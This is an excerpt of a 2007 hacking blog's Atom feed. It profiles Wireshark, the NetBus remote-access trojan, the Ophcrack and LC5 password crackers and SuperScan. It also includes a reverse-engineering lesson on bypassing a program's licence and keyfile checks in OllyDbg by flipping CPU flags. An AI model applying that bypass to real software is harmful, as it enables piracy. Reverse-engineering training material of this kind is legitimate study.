src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-2257110456518920013</id><published>2007-05-25T12:06:00.000+05:30</published><updated>2007-05-25T12:15:40.062+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>WIRESHARK</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_tGUVOS5hsyc/RlaFS6dhyvI/AAAAAAAAAG0/wXdSq4z1SQg/s1600-h/shark.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_tGUVOS5hsyc/RlaFS6dhyvI/AAAAAAAAAG0/wXdSq4z1SQg/s200/shark.jpg" alt="" id="BLOGGER_PHOTO_ID_5068384990629317362" border="0" /&gt;&lt;/a&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;Wireshark &lt;/span&gt;(Known as Ethereal) is the world's most popular network protocol analyzer. It has a rich and powerful feature set and runs on most computing platforms including Windows, OS X, and Linux. It is freely available as open source.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:arial;"&gt;It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences).&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-2257110456518920013?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/2257110456518920013/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=2257110456518920013' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2257110456518920013'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2257110456518920013'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/05/wireshark.html' title='WIRESHARK'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_tGUVOS5hsyc/RlaFS6dhyvI/AAAAAAAAAG0/wXdSq4z1SQg/s72-c/shark.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-4078749316379628437</id><published>2007-04-24T17:30:00.000+05:30</published><updated>2007-05-13T21:10:29.422+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>NETBUS</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_tGUVOS5hsyc/RkcxVuRtBCI/AAAAAAAAAEw/54q_Po_k8dQ/s1600-h/news-zotob-worm.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://1.bp.blogspot.com/_tGUVOS5hsyc/RkcxVuRtBCI/AAAAAAAAAEw/54q_Po_k8dQ/s200/news-zotob-worm.jpg" alt="" id="BLOGGER_PHOTO_ID_5064070555270710306" border="0" /&gt;&lt;/a&gt;&lt;b&gt;NetBus&lt;/b&gt; is a program used to control microsoft windows computer systems over a network. (what we say as "Breaking into Computer System")&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;    &lt;/div&gt;&lt;p style="text-align: justify;"&gt;There are two components in this program a client and a server. The server must be installed and run on the computer that should be remotely controlled.&lt;br /&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;The client program allows the hacker to control the target system. Some of its features includes-&lt;/p&gt;&lt;p&gt;1). Keystroke Logging.&lt;/p&gt;&lt;p&gt;2). Capturing Screen Shots.&lt;/p&gt;&lt;p&gt;3). Shutting down the system, etc...&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;It is recognized by most of the anti virus programs......&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-4078749316379628437?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/4078749316379628437/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=4078749316379628437' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/4078749316379628437'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/4078749316379628437'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/netbus.html' title='NETBUS'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_tGUVOS5hsyc/RkcxVuRtBCI/AAAAAAAAAEw/54q_Po_k8dQ/s72-c/news-zotob-worm.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-5190976884799375767</id><published>2007-04-24T17:00:00.000+05:30</published><updated>2007-05-08T18:48:38.447+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>OPHCRACK</title><content type='html'>&lt;div align="justify"&gt;&lt;a href="http://2.bp.blogspot.com/_tGUVOS5hsyc/RkB4XuRtBAI/AAAAAAAAAEg/mEL-focSipQ/s1600-h/table2.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5062178330119046146" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://2.bp.blogspot.com/_tGUVOS5hsyc/RkB4XuRtBAI/AAAAAAAAAEg/mEL-focSipQ/s200/table2.jpg" border="0" /&gt;&lt;/a&gt;&lt;span style="font-family:arial;"&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Ophcrack&lt;/span&gt;&lt;/strong&gt; is an open source program that cracks Windows password (LM HASHES) using rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-family:arial;"&gt;It recovers 99.9% of alphanumeric passwords in seconds.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-5190976884799375767?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/5190976884799375767/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=5190976884799375767' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5190976884799375767'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5190976884799375767'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/ophcrack.html' title='OPHCRACK'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_tGUVOS5hsyc/RkB4XuRtBAI/AAAAAAAAAEg/mEL-focSipQ/s72-c/table2.jpg' height='72' width='72'/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-5694363763300043998</id><published>2007-04-24T16:01:00.000+05:30</published><updated>2007-04-30T20:57:41.833+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>LC 5</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_tGUVOS5hsyc/RjMi-uRtA2I/AAAAAAAAADA/X-LkPVJPPX4/s1600-h/securitycheck.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 139px; height: 162px;" src="http://1.bp.blogspot.com/_tGUVOS5hsyc/RjMi-uRtA2I/AAAAAAAAADA/X-LkPVJPPX4/s200/securitycheck.jpg" alt="" id="BLOGGER_PHOTO_ID_5058425267436716898" border="0" /&gt;&lt;/a&gt;&lt;span class="article"&gt;&lt;span name="intelliTxt" id="intelliTxt"&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;LC 5&lt;/span&gt; supports most password-cracking methods and comes in four versions (professional, administrator, site, and consultant—available features vary depending on version).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div  style="text-align: justify;font-family:arial;"&gt;&lt;br /&gt;&lt;span class="article"&gt;&lt;span name="intelliTxt" id="intelliTxt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="article"&gt;&lt;span name="intelliTxt" id="intelliTxt"&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;LC 5&lt;/span&gt; includes a remote agent that lets you centrally manage audits of multiple cross-domain computers and gather all account information at one location. After completing an audit, you can review risk scores, audit method, and character-set or password-length distribution. LC 5 also lets you disable accounts or force users to reset weak passwords.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-5694363763300043998?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/5694363763300043998/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=5694363763300043998' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5694363763300043998'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5694363763300043998'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/lc-5.html' title='LC 5'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_tGUVOS5hsyc/RjMi-uRtA2I/AAAAAAAAADA/X-LkPVJPPX4/s72-c/securitycheck.jpg' height='72' width='72'/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-6326044555679748982</id><published>2007-04-24T15:39:00.000+05:30</published><updated>2007-05-26T15:42:20.133+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Lessons'/><title type='text'>HACKING TEST 17</title><content type='html'>&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="font-family: Arial;"&gt;Reverse Engineering Contd………&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="font-family: Arial;"&gt;How to Clear Hacking Test 5?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="font-family: Arial;"&gt;Steps…..&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;1).Open the file in OllyDbg.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;2).This program has an option to execute one line at a time (shortcut F8).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;3).Keep on pressing F8 and at the same time keep an eye on all the 5 windows (upper left, upper center, upper right, lower left and lower right). Whenever you’ll press F8 you will see some changes in all these 5 windows.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;4). Keep on pressing F8 until you reach the following instruction “CMP EAX, -1” followed by “JNZ Short 0040109A”.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family: Arial; color: blue;"&gt;What’s happening here?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: maroon;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-family: Arial; color: blue;"&gt;Here Value in EAX is compared with -1 i.e. FFFFFFFF and if the result is Zero then the JNZ (Jump if not Zero) instruction will not result in a jump and the instruction following JNZ will be executed.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;Check out the value stored in the EAX registers (See just above the lower left window), its FFFFFFFF.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;&lt;o:p&gt;&lt;/o:p&gt;So the Jump will not take place and hence the next instruction will get executed which will inevitably take you to “Evaluation period out of date, purchase new license”. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;So we need to somehow skip this instruction.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Check out the upper right window, here you can see the flags which are set when the jump instruction is executed. Currently the value of Z flag is 1 so if we change this value to zero then the JNZ instruction will result in a jump (double click on it, the value will be changed to zero).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;&lt;o:p&gt;&lt;/o:p&gt;So, this way we were able to skip this first barrier. Check out the program you’ll find three more of them.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;br /&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;5).Keep on pressing F8 until you reach the following instruction “JNZ SHORT 004010B4” followed by “JMP SHORT 004010F7”.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family: Arial; color: blue;"&gt;What’s happening here?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;      &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-family: Arial; color: blue;"&gt;Here you can see that if JNZ instruction will not make a jump then JMP instruction will make a jump to 004010F7 which will inevitably take you to “Keyfile is not valid, Sorry”. &lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;So here again you have to perform the same step just change the value of Z flag from 1 to zero.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;So, this way we were again able to skip the second barrier. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial;"&gt;6).Keep on pressing F8 until you reach the following instruction “JL SHORT 004010F7”.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family: Arial; color: blue;"&gt;What’s happening here?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-family: Arial; color: blue;"&gt;Here you can see that there is no JNZ instruction but the JL instruction is again making the jump to 004010F7 which will inevitably take you to “Keyfile is not valid, Sorry”.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;So here again you have to perform the same step but with a twist just change the value of S flag from 1 to zero. Since, this is the flag which gets affected when the JL instruction is executed.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;So this way we were again able to skip the third barrier. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;&lt;o:p&gt;&lt;/o:p&gt;The next jump instruction i.e. JE SHORT 004010D3 is not taking us to any barrier so don’t change any value, and keep on pressing F8, but again we reach the instruction JL SHORT 004010F7 which will again take us to “Keyfile is not valid, Sorry”, but if we are able to skip this instruction then the next jump is to the address 00401205 which stores the value “You really did it! Congratz !!!”.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;&lt;o:p&gt;&lt;/o:p&gt;So all we need to do is just set the S flag to zero and we will reach our destination.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="font-family: Arial;"&gt;Finalizing the patch-&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;            &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-size: 14pt; font-family: Arial; color: red;"&gt;……………will continue&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family: Arial; color: blue;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-6326044555679748982?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/6326044555679748982/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=6326044555679748982' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/6326044555679748982'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/6326044555679748982'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-test-17.html' title='HACKING TEST 17'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-2416381096922731394</id><published>2007-04-24T15:30:00.000+05:30</published><updated>2007-04-26T15:33:49.345+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>SUPER SCAN v 4.0</title><content type='html'>&lt;span class="Utxt6Bold"&gt;&lt;/span&gt;A Powerful TCP port scanner, pinger, resolver.  Here are some of the features in this version-&lt;br /&gt;&lt;br /&gt;&lt;table align="center" border="0" cellpadding="0" cellspacing="0" width="95%"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td align="right" bgcolor="#d7d7d7" valign="top" width="3%"&gt;&lt;img src="http://www.foundstone.com/images/bullet_4.gif" height="9" width="5" /&gt;&lt;/td&gt;              &lt;td bgcolor="#d7d7d7" width="97%"&gt;Superior scanning speed&lt;/td&gt;         &lt;/tr&gt;       &lt;/tbody&gt;&lt;/table&gt;        &lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td height="1"&gt;&lt;br /&gt;&lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td&gt;       &lt;table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"&gt;         &lt;tbody&gt;&lt;tr&gt;        &lt;td align="right" bgcolor="#d7d7d7" valign="top" width="3%"&gt;&lt;img src="http://www.foundstone.com/images/bullet_4.gif" height="9" width="5" /&gt;&lt;/td&gt;              &lt;td bgcolor="#d7d7d7" width="97%"&gt;Support for unlimited IP ranges&lt;/td&gt;         &lt;/tr&gt;       &lt;/tbody&gt;&lt;/table&gt;     &lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td height="1"&gt;&lt;br /&gt;&lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td&gt;       &lt;table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"&gt;         &lt;tbody&gt;&lt;tr&gt;        &lt;td align="right" bgcolor="#d7d7d7" valign="top" width="3%"&gt;&lt;img src="http://www.foundstone.com/images/bullet_4.gif" height="9" width="5" /&gt;&lt;/td&gt;              &lt;td bgcolor="#d7d7d7" width="97%"&gt;Improved host detection using multiple ICMP methods &lt;/td&gt;         &lt;/tr&gt;       &lt;/tbody&gt;&lt;/table&gt;     &lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td height="1"&gt;&lt;br /&gt;&lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td&gt;       &lt;table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"&gt;         &lt;tbody&gt;&lt;tr&gt;        &lt;td align="right" bgcolor="#d7d7d7" valign="top" width="3%"&gt;&lt;img src="http://www.foundstone.com/images/bullet_4.gif" height="9" width="5" /&gt;&lt;/td&gt;              &lt;td bgcolor="#d7d7d7" width="97%"&gt;TCP SYN scanning&lt;/td&gt;         &lt;/tr&gt;       &lt;/tbody&gt;&lt;/table&gt;     &lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td height="1"&gt;&lt;br /&gt;&lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td&gt;       &lt;table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"&gt;         &lt;tbody&gt;&lt;tr&gt;        &lt;td align="right" bgcolor="#d7d7d7" valign="top" width="3%"&gt;&lt;img src="http://www.foundstone.com/images/bullet_4.gif" height="9" width="5" /&gt;&lt;/td&gt;              &lt;td bgcolor="#d7d7d7" width="97%"&gt;UDP scanning (two methods)&lt;/td&gt;         &lt;/tr&gt;       &lt;/tbody&gt;&lt;/table&gt;     &lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td height="1"&gt;&lt;br /&gt;&lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td&gt;       &lt;table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"&gt;         &lt;tbody&gt;&lt;tr&gt;        &lt;td align="right" bgcolor="#d7d7d7" valign="top" width="3%"&gt;&lt;img src="http://www.foundstone.com/images/bullet_4.gif" height="9" width="5" /&gt;&lt;/td&gt;              &lt;td bgcolor="#d7d7d7" width="97%"&gt;IP address import supporting ranges and CIDR formats &lt;/td&gt;         &lt;/tr&gt;       &lt;/tbody&gt;&lt;/table&gt;     &lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td height="1"&gt;&lt;br /&gt;&lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td&gt;       &lt;table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"&gt;         &lt;tbody&gt;&lt;tr&gt;        &lt;td align="right" bgcolor="#d7d7d7" valign="top" width="3%"&gt;&lt;img src="http://www.foundstone.com/images/bullet_4.gif" height="9" width="5" /&gt;&lt;/td&gt;              &lt;td bgcolor="#d7d7d7" width="97%"&gt;Simple HTML report generation&lt;/td&gt;         &lt;/tr&gt;       &lt;/tbody&gt;&lt;/table&gt;     &lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td height="1"&gt;&lt;br /&gt;&lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td&gt;       &lt;table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"&gt;         &lt;tbody&gt;&lt;tr&gt;        &lt;td align="right" bgcolor="#d7d7d7" valign="top" width="3%"&gt;&lt;img src="http://www.foundstone.com/images/bullet_4.gif" height="9" width="5" /&gt;&lt;/td&gt;              &lt;td bgcolor="#d7d7d7" width="97%"&gt;Source port scanning&lt;/td&gt;         &lt;/tr&gt;       &lt;/tbody&gt;&lt;/table&gt;     &lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td height="1"&gt;&lt;br /&gt;&lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td&gt;       &lt;table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"&gt;         &lt;tbody&gt;&lt;tr&gt;        &lt;td align="right" bgcolor="#d7d7d7" valign="top" width="3%"&gt;&lt;img src="http://www.foundstone.com/images/bullet_4.gif" height="9" width="5" /&gt;&lt;/td&gt;              &lt;td bgcolor="#d7d7d7" width="97%"&gt;Fast hostname resolving&lt;/td&gt;         &lt;/tr&gt;       &lt;/tbody&gt;&lt;/table&gt;     &lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td height="1"&gt;&lt;br /&gt;&lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td&gt;       &lt;table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"&gt;         &lt;tbody&gt;&lt;tr&gt;        &lt;td align="right" bgcolor="#d7d7d7" valign="top" width="3%"&gt;&lt;img src="http://www.foundstone.com/images/bullet_4.gif" height="9" width="5" /&gt;&lt;/td&gt;              &lt;td bgcolor="#d7d7d7" width="97%"&gt;Extensive banner grabbing&lt;/td&gt;         &lt;/tr&gt;       